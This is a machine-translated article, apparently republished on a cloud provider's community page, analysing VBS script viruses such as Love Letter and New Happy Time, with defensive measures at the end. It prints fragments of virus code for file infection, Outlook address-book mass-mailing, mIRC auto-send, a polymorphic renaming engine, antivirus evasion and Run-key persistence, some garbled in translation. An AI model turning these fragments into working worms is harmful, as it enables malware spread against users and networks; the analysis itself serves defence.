The principle analysis and precaution _vbs of VBS script virus

Source: Internet
Author: User
Tags exception handling function definition php and
The popularity of the internet has made our world a better place, but it has also made people unhappy. When you receive a message with the theme "I Love You", when you click on an attachment with a mouse that is almost shaking with excitement, when you browse a trusted Web site and find it very slow to open each folder, do you realize that the virus has broken into your world? May 4, 2000 in Europe and the United States outbreak of "love Worms" network worm virus. As a result of the spread through the e-mail system, the virus in just a few days in the world's millions of of thousands of computer attacks. Many large enterprise networks, including Microsoft and Intel, have been paralysed and the global economy has lost $ billions of trillion. And last year's new happy Time virus has made the majority of computer users are miserable.
One of the biggest common features of the two viruses mentioned above is that they are written using VBScript. To love the worm and the new Happy time virus is typical of the VBS script virus is rampant, a very important reason is that it is easy to write. Here we will analyze each aspect of the VBS scripting virus:

The characteristics and development of VBS script virus
VBS virus is written with VB Script, the scripting language is very powerful, they take advantage of the open features of Windows system, by calling some ready-made Windows objects, components, can directly to the file system, registry control, the function is very powerful. It should be said that the virus is a thought, but this idea in the implementation of the VBS is extremely easy. The VBS script virus has several characteristics:
1. Simple to write, a virus that previously knew nothing about the virus could make up a new virus in a short time.
2. Great destructive power. Its destructive power not only manifests in the user system file and the performance destruction. He can also crash the mail server and cause serious network congestion.
3. Strong appeal. Since the script is interpreted directly, and it does not require a complex PE file format to be processed like a PE virus, such viruses can infect other files in the same way directly by replicating themselves, and the exception handling of the ego becomes very easy.
4. Wide spread. Such viruses can be spread around the world in a very short time through HTM documents, email attachments or other means.
5. Virus source code is easy to get, many varieties. Because of the implementation of VBS virus interpretation, the source code is very readable, even if the virus source code after the encryption process, the source of the acquisition is relatively simple. Therefore, this kind of virus variant is more, slightly changes the virus structure, or modifies the characteristic value, many anti-virus software may be powerless.
6. Cheating is strong. Script virus in order to get the opportunity to run, often use a variety of means to make users less attention, for example, the attachment name of the message with a double suffix, such as. Jpg.vbs, because the system does not display a suffix by default, so that when users see this file, it will be considered a JPG picture file
7. Makes it very easy for a virus-producing machine to be implemented. The so-called virus production machine, is can according to the user's wishes, the machine that makes the virus (of course, this is the program), the current virus production machine, most of which is a scripting virus production machine, the most important thing is because the script is interpreted to execute, the implementation is very easy, specifically will be discussed later.
Because of the above features, the script virus develops unusually rapidly, especially the emergence of virus production machines, making it very easy to generate new scripting viruses.

Analysis of the principle of VBS script virus
1. How the VBS script virus infects, searches for files
The VBS script virus is usually directly infected with the file by self-replicating, most of the code in the virus can be directly attached to other similar programs in the middle, such as the new Happy time virus can attach its own code to the. htm file, and at the top add a statement calling the virus code, while the virus is directly generated a copy of the file, the virus code into which, and the original file name as the prefix of the virus file name, vbs as a suffix. Below, we use part of the code of the virus to specifically analyze the infection and search principle of this type of virus:
The following are some of the key code for file infections:
Set fso=createobject ("Scripting.FileSystemObject") ' Creates a file system object
Set Self=fso.opentextfile (wscript.scriptfullname,1) read Open the current file (that is, the virus itself)
Vbscopy=self.readall ' reads virus all code to string variable vbscopy ...
Set Ap=fso.opentextfile (destination file. path,2,true) ' Write open target file, ready to write virus code
Ap.write vbscopy ' Overwrite the target file with the virus code
Ap.close
Set Cop=fso.getfile (destination file. Path) ' Gets the destination file path
Cop.copy (destination file. Path & ". vbs") ' Create another virus file (with a. vbs suffix)
Target file. Delete (true) Delete destination file
It describes how a virus file infects a normal file: First assigns the virus's own code to the string variable vbscopy, and then overwrites the string to the destination file, creating a copy of the file with the filename prefix, the VBS suffix, and the destination file deleted.
Below we specifically analyze the file search code:
' This function is primarily used to find files that meet the criteria and generate a virus copy of the corresponding file.
Sub Scan (folder_) ' Scan function definition,
On Error Resume Next ' If there is an error, skip directly to prevent pop-up error window
Set Folder_=fso.getfolder (Folder_)
Set Files=folder_.files ' All file collections for the current directory
For each file in Filesext=fso. Getextensionname (file) ' Get filename suffix
Ext=lcase (ext) ' suffix name converted to lowercase letter
If ext= "MP5" then "if the suffix name is MP5, it is infected." Please create the appropriate suffix name file, preferably an abnormal suffix name, so as not to damage the normal program.
WScript.Echo (file)
End If
Next
Set Subfolders=folder_.subfolders
For all subfolder in subfolders ' Search for other directories; recursive call
Scan ()
Scan (subfolder)
Next
End Sub
The code above is the code analysis of the VBS script virus for file search. The Search section scan () function is more concise, very ingenious, using a recursive algorithm to traverse the entire partition's directory and files.

2. Several ways and code analysis of VBS script virus propagating through Network
The VBS script virus spreads a wide range, mainly relies on its network propagation function, in general, the VBS script virus uses the following several ways to propagate:
1) through the email attachment transmission
This is a very common way of communication, the virus can be a variety of ways to get the legal email address, the most common is directly to the Outlook Address Book e-mail address, but also through the program in the user's documents (such as HTM file) to search email address.
Here's a concrete look at how the VBS script virus does this:
Function Mailbroadcast ()
On Error Resume Next
WScript.Echo
Set Outlookapp = CreateObject ("Outlook.Application")//Create an object for Outlook application
If outlookapp= "Outlook" Then
Set mapiobj=outlookapp.getnamespace ("MAPI")//Get MAPI name space
Set addrlist= mapiobj.addresslists//Get the number of address tables
For each addr in addrlist
If addr. Addressentries.count <> 0 Then
Addrentcount = addr. Addressentries.count//Get the number of email records for each address table
For addrentindex= 1 to Addrentcount//Traverse Address Table email address
Set item = Outlookapp.createitem (0)//Get a Message object instance
Set addrent = addr. AddressEntries (Addrentindex)//Get Specific email address
Item. to = addrent.address//Fill in the delivery address item. Subject = "Virus Propagation Experiment"//write Message title
Item. BODY = "Here is the virus message transmission test, receive this letter please do not Panic!" "//Write file contents
Set Attachments=item. Attachments//define mail attachments
Attachments.Add filesysobj.getspecialfolder (0) & "\test.jpg.vbs"
Item. Deleteaftersubmit = True//mail is automatically deleted after submission
IF item. To <> "" Then
Item. Send//Send mail
Shellobj.regwrite "hkcu\software\mailtest\mailed", "1"//virus mark to avoid duplicate infection
End If
Next
End If
Next
End If
End Function

2) sharing through the LAN communication
The shared communication of LAN is also a very common and effective way of network communication. Generally speaking, in order to facilitate communication within the LAN, there must be a lot of shared directories, and have writable permissions, such as Win2000 when creating a share, the default is to have writable permissions. The virus can then propagate the virus code into these directories by searching for these shared directories.
In the VBS, there is an object that enables the search and file operations of the shared folders of the network Places. We can use this object to achieve the purpose of communication.
welcome_msg = "Network connection Search test"
Set WSHNetwork = WScript.CreateObject ("Wscript.Network") ' Creates a network object
Set oprinters = Wshnetwork.enumprinterconnections ' Create a network printer connection list
WScript.Echo "Network Printer mappings:"
For i = 0 to oprinters.count-1 Step 2 ' Displays network printer connections
WScript.Echo "Port" & Oprinters.item (i) & "=" & Oprinters.item (i+1)
Next
Set coldrives = wshnetwork.enumnetworkdrives ' Create a network share connection list
If coldrives.count = 0 Then
MsgBox "There are no drives to list. ", vbinformation + vbokonly,welcome_msg
Else
STRMSG = "Current network drive Connection:" & CRLF
For i = 0 to coldrives.count-1 Step 2
STRMSG = STRMSG & Chr (a) & Chr (a) & Coldrives (i) & Chr (9) & Coldrives (i + 1)
Next
MsgBox STRMSG, vbinformation + vbOKOnly, welcome_msg ' show current network drive connection
End If
Above is a complete script to find the current printer connection and network share connection and display them. Once we know the shared connection, we can read and write files directly to the target drive.

3 through the infection of HTM, ASP, JSP, PHP and other Web documents spread
Today, the WWW service has become very common, viruses through the infection of HTM and other files, is bound to cause all the users have access to the Web page of the machine virus infection.
The virus is able to play a powerful function in the HTM file, using the same principle as most malicious Web page code. Basically, they use the same code, but other code, which is the key to fso,wsh such as viruses, can run on a Web page. Under the registry hkey_classes_root\clsid\ we can find such a primary key {f935dc22-1cf0-11d0-adb9-00c04fd58a0b}, which is described in the registry as "Windows Script Host Shell Object ", similarly, we can also find {0d43fe01-f093-11cf-8940-00a0c9054228}, the registry to its description is" filesystem Object ", generally first to initialize COM, After getting the corresponding Component object, the virus can correctly use the FSO, WSH two objects, invoke their powerful capabilities. The code looks like this:
Set apple0bject = document.applets ("Kj_guest")
Apple0bject.setclsid ("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")
Apple0bject.createinstance () ' Create an instance
Set Wsshell Apple0bject.get0bject ()
Apple0bject.setclsid ("{0d43fe01-f093-11cf-8940-00a0c9054228}")
Apple0bject.createinstance () ' Create an instance
Set FSO = Apple0bject.get0bject ()
For other types of files, this is no longer analyzed here.

4) through IRC chat channel transmission
Viruses spread through IRC generally using the following code (take mIRC as an example)
Dim mIRC
Set Fso=createobject ("Scripting.FileSystemObject")
Set MIRC=FSO. CreateTextFile ("C:\mirc\script.ini") ' Create file Script.ini
Fso. CopyFile wscript.scriptfullname, "C:\mirc\attachment.vbs", True ' back up virus files to Attachment.vbs
mIRC. WriteLine "[Script]"
mIRC. WriteLine "N0=on 1:join:*.*: {if ($nick!= $me) {halt}/DCC send $nick C:\mirc\attachment.vbs}"
' Use command/DDC send $nick attachment.vbs send virus files to other users in the channel
mIRC. Close
The above code writes a line of code to the Script.ini file, and many other code is actually written. The Script.ini contains commands for controlling IRC sessions, and the commands in this file can be executed automatically. For example, the "Tune.vbs" virus will modify c:\mirc\script.ini and C:\mirc\mirc.ini so that whenever an IRC user uses an infected channel, it will receive a tune.vbs sent via DDC. Similarly, if Pirch98 is installed in the c:\pirch98 directory of the target computer, the virus modifies C:\pirch98\events.ini and c:\pirch98\ Pirch98.ini allows an IRC user to receive a tune.vbs sent via DDC whenever an infected channel is used.
In addition, the virus can also be spread by now widely popular Kazaa. The virus copies the virus files to the default shared directory of Kazaa, so that when other users access the machine, it is possible to download the virus file and execute it. This method of propagation may play a role in the popularity of Kazaa-point-point sharing tools.
There are other ways of communication that we don't list here.


3. VBS script virus how to gain control
How to gain control? This one is a more interesting topic, and the VBS script virus seems to play the topic to the fullest. The author lists several typical methods here:
1) Modify the registry key
When Windows starts, it automatically loads the program that each key value under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run entry holds. The script virus can add a key value to the virus program under this key, so that it can be controlled every time the machine starts. VBS to modify the method of storage table is relatively simple, directly call the following statement.
Wsh. RegWrite (StrName, Anyvalue [, Strtype])
2 by mapping File execution mode
For example, our new happy hour modifies the way the DLL is executed to Wscript.exe. You can even point an EXE file to a virus code.
3 deceive users, let users perform their own
This approach is actually related to the user's psychology. For example, the virus in the sending attachment, using a double suffix file name, because by default, the suffix does not show, for example, file name Beauty.jpg.vbs's VBS program appears as Beauty.jpg, when users will often take it as a picture to click. Similarly, for the user's own disk files, the virus infected them, the original file name as a prefix, vbs as a suffix to produce a virus file, and delete the original file, so that users may be the VBS file as their original file run.
4) Desktop.ini and Folder.htt cooperate with each other
These two files can be used to configure the Active Desktop or to customize the folder. If the user's directory contains these two files, the virus code in Folder.htt will be triggered when the user enters the directory. This is a new happy time virus to use a more effective way to gain control. And the use of Folder.htt, may also trigger the EXE file, which may become a virus to get control of an effective way!
There are many ways in which the virus can gain control, and the author has much room to play.

4. Several techniques of VBS script virus against Anti-Virus software
The ability to fight anti-virus software is essential if the virus is to survive. In general, the VBS scripting virus uses the following methods to combat anti-virus software:
1) Self-encryption
For example, the new Happy time virus, it can randomly select the key to their own part of the code to encrypt the transformation, so that each infected virus code is different, to achieve a polymorphic effect. This has brought some difficulties to the traditional method of characteristic value search. The virus can also be used to further the use of deformation technology, so that each infection after the decryption of the encrypted virus code are different.
Here's a simple VBS script transform engine (from Flyshadow)
Randomize
Set of = CreateObject ("Scripting.FileSystemObject") ' Creates a file system object
VC = Of.opentextfile (Wscript.scriptfullname, 1). ReadAll ' reads its own code
FS = Array ("of", "VC", "FS", "FSC") ' defines a character that is about to be replaced
For FSC = 0 to 3
VC = Replace (VC, FS (FSC), Chr (int (Rnd) +-)) & Chr (int (Rnd) + ()) & Chr (int (Rnd) +) & Chr (Int (RND * 22) + 65)) ' takes 4 random characters to replace the string in the array fs
Next
Of.opentextfile (Wscript.scriptfullname, 2, 1). Writeline VC ' writes the replacement code back to the file
The above code allows the VBS file to be replaced with a random string of OF,VC,FS,FSC four strings each time it is run, which can largely prevent anti-virus software from detecting it using eigenvalue detection.
2) skillfully using the Execute function
Does a friend with a VBS program find it strange that when a normal program uses a FileSystemObject object, some anti-virus software reports that the VBS file is at high risk when scanning the program. But some VBS script viruses also use FileSystemObject objects, but why don't they have any warning? The reason is simple, because these viruses cleverly use the Execute method. Some anti-virus software detects the VBS virus, will check the program whether to declare the use of the FileSystemObject object, if adopted, this will issue an alarm. If the virus converts this declaration code into a string and executes it through the Execute (string) function, it can evade some anti-virus software.
3) Change the declaration method of some objects
such as Fso=createobject ("Scripting.FileSystemObject"), we change it to
Fso=createobject ("script" + "Ing.filesyste" + "Mobject") so that anti-virus software will not find the FileSystemObject object when it is statically scanned.
4) Direct shutdown of anti-virus software
The VBS script is powerful, it can be directly in the search of the user process and then compare the process name, if the process is found to be anti-virus software directly shut down and some of its key programs are deleted.

5. Introduction to the principle of VBS virus production machine
The so-called virus production machine refers to the software that can produce virus source code directly according to the user's choice. This may seem incredible to many people, but it's very simple to implement for scripting viruses.
The scripting language is interpreted to execute, does not need to compile, the program does not need what checksum is positioned, each statement separates more clearly. In this way, the virus can be made into a number of separate modules, the user made the virus function selection, the production machine only need to put together the corresponding functional modules, and finally make the corresponding code replacement and optimization can be. For space and other reasons, no details are given here.

Iii. how to prevent the VBS script virus
1. How to extract (encrypt) a script virus from a sample
For a script virus that is not encrypted, we can find it directly from a virus sample, and now we'll look at how to extract the encrypted VBS script virus from a virus sample, and here we take the new happy hour as an example.
Open Folder.htt with Jediedit. We found that this file is only 93 lines in total, the first line <body onload= "Vbscript:kj_start ()" ", and after a few lines of comment, start with the Line 87th to 91, is the following statement:
87:<script language=vbscript>
88:exestring = "Afi Fkseboa) EQIIQBTQ) S^PQBTQ) AADOBAPFDJ) &GT;MLIBL^GB ' P) CPK ... ; The back is omitted, very long!
89:execute ("Dim Keyarr" (3), Thistext "&vbCrLf&" Keyarr (0) = 3 "&vbCrLf&" Keyarr (1) = 3 "&vbCrLf&" Keyarr (2) = 3 "&vbCrLf&" Keyarr (3) = 4 "&vbCrLf&" for I=1 to Len (exestring) "&vbCrLf&" Tempnum = ASC ( Mid (exestring,i,1) "&vbCrLf&" If tempnum = Then "&vbCrLf&" tempnum =% "&vbCrLf&" End If "& vbcrlf& "Tempchar = Chr (Tempnum + keyarr (i Mod 4))" &vbCrLf& "If Tempchar = Chr (a) Then" &vbCrLf& " Tempchar = vbcr "&vbCrLf&" ElseIf Tempchar = Chr () Then "&vbCrLf&" Tempchar = vblf "&vbCrLf&" end If "&vbCrLf&" Thistext = thistext & Tempchar "&vbCrLf&" Next ") 90:execute (Thistext) 91:</script >
Lines 87th and 91 do not have to be explained, and line 88th is an assignment of a string, which is clearly a coded virus code. Look at the last piece of code in line 89 Thistext = Thistext & Tempchar, plus the following line, we can certainly guess Thistext is in the virus decryption code (the brother who is familiar with VBS can also analyze this decryption code, too Simple! should be able to see it even without looking at the code at all. Line 90th is to execute the code in the Thistext (the code after the decryption process).
So, what should we do next? Very simply, once the virus code is decrypted, the output of the Thistext content to a text file can be solved. Since the top lines are VBScript, I created the following. txt file:
First of all, copy the 88th and 892 lines to the. txt file that you just created, but if you'd like to see the effect of the new happy Hour, you can also enter line 90th at the end. Then enter the create file and write the Thistext to the file VBS code in the following line, as the entire file looks like this:
exestring = "Afi ... ' Line 88th Code Execute (' Dim Keyar ... ' Line 89th code
Set Fso=createobject ("Scripting.FileSystemObject") ' Creates a file system object
Set Virusfile=fso.createtextfile ("Resource.log", true) creates a new file Resource.log to store the decrypted virus code Virusfile.writeline ( Thistext) ' writes the decrypted code to Resource.log
Ok! As simple as that, save the file, and change the file suffix. txt to. vbs (. VBE also can), double-click, you will find that the file directory more than a file Resource.log, open this file, how? is not "new Happy time" source code Ah!

2. The weakness of the VBS script virus
The VBS script virus is not as convenient and flexible as the PE file because it is written as a script, and its operation is conditional (though this condition is by default). The author believes that the VBS script virus has the following weaknesses:
1 The majority of the VBS script virus to run when the need to use an object: FileSystemObject
2 The VBScript code is interpreted by Windows Script host for execution.
3 The operation of the VBS script virus requires the support of its associated program Wscript.exe.
4 virus transmission through the Web requires ActiveX support
5 through email transmission of the virus needs OE automatic mail function support, but most of the virus is to email as the main mode of transmission.

3. How to prevent and release the VBS script virus
For the above mentioned VBS script virus weaknesses, the author puts forward the following central precautionary measures:
1 Disable File system objects FileSystemObject
Method: Use regsvr32 scrrun.dll/u This command to disable file system objects. Where regsvr32 is the executable file under Windows\System. or directly find Scrrun.dll files deleted or renamed.
Another way is to find a primary key {0d43fe01-f093-11cf-8940-00a0c9054228} under Hkey_classes_root\clsid\ in the registry.
2 Uninstall Windows Scripting Host
In Windows 98 (more than NT 4.0), open the "Windows scripting Host" item by opening the [Control Panel]→[Add/Remove Program]→[windows installer]→[attachment].
As in the above method, in the registry hkey_classes_root\clsid\ found a primary key {f935dc22-1cf0-11d0-adb9-00c04fd58a0b}, click.
3 Delete the VBS, VBE, JS, jse file suffix name and application mappings
Click [My Computer]→[View]→[Folder Options]→[file Type], and then delete the VBS, VBE, JS, jse file suffix name and application mappings.
4 in the Windows directory, to find WScript.exe, change the name or delete, if you think you have the opportunity to use, it is best to change the name of the good, of course, you can also reload.
5 to completely prevent the VBS network worm, you need to set up your browser. We first open the browser and click the [Custom Level] button in the Internet Options Security tab of the menu bar. Disable all ActiveX controls and plugins so that you are not afraid. Oh, such as the new happy time of that ActiveX component if not run, network communication This function is finished.
6) prohibit the automatic mail-receiving function of OE
7 Because most worms use files to expand their masterpiece articles, it is not to hide the extensions of known file types in the system. Windows defaults to "hide extended names of known file types" and modify them to show extended names for all file types.
8 The security level of the network connection of the system is set at least "medium", it can prevent some harmful Java programs or some ActiveX components from violating the computer to some extent.
9 hehe, the last one does not say everyone should know, antivirus software is really necessary, although some anti-virus software quite let the vast number of users disappointed, but the choice is both sides of the OH. In this virus flying across the network, if your machine does not install anti-virus software I think it is quite incredible.

Iv. prospects for the development of all script-like viruses
With the rapid development of the network, the network worm virus began to become popular, and the VBS script worm is more prominent, not only a large number, but also powerful. Because of the simplicity of scripting viruses, there will be more and more other scripting viruses, such as php,js,perl viruses, in addition to continuing to pop the current VBS script virus.
But the script is not the best tool for real virus enthusiasts to write viruses, and the scripting virus is easier and relatively easy to guard against. The author believes that the script virus will continue to prevail, but the ability to have as much impact as love worms, new happy times, the script worm virus is only a few.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.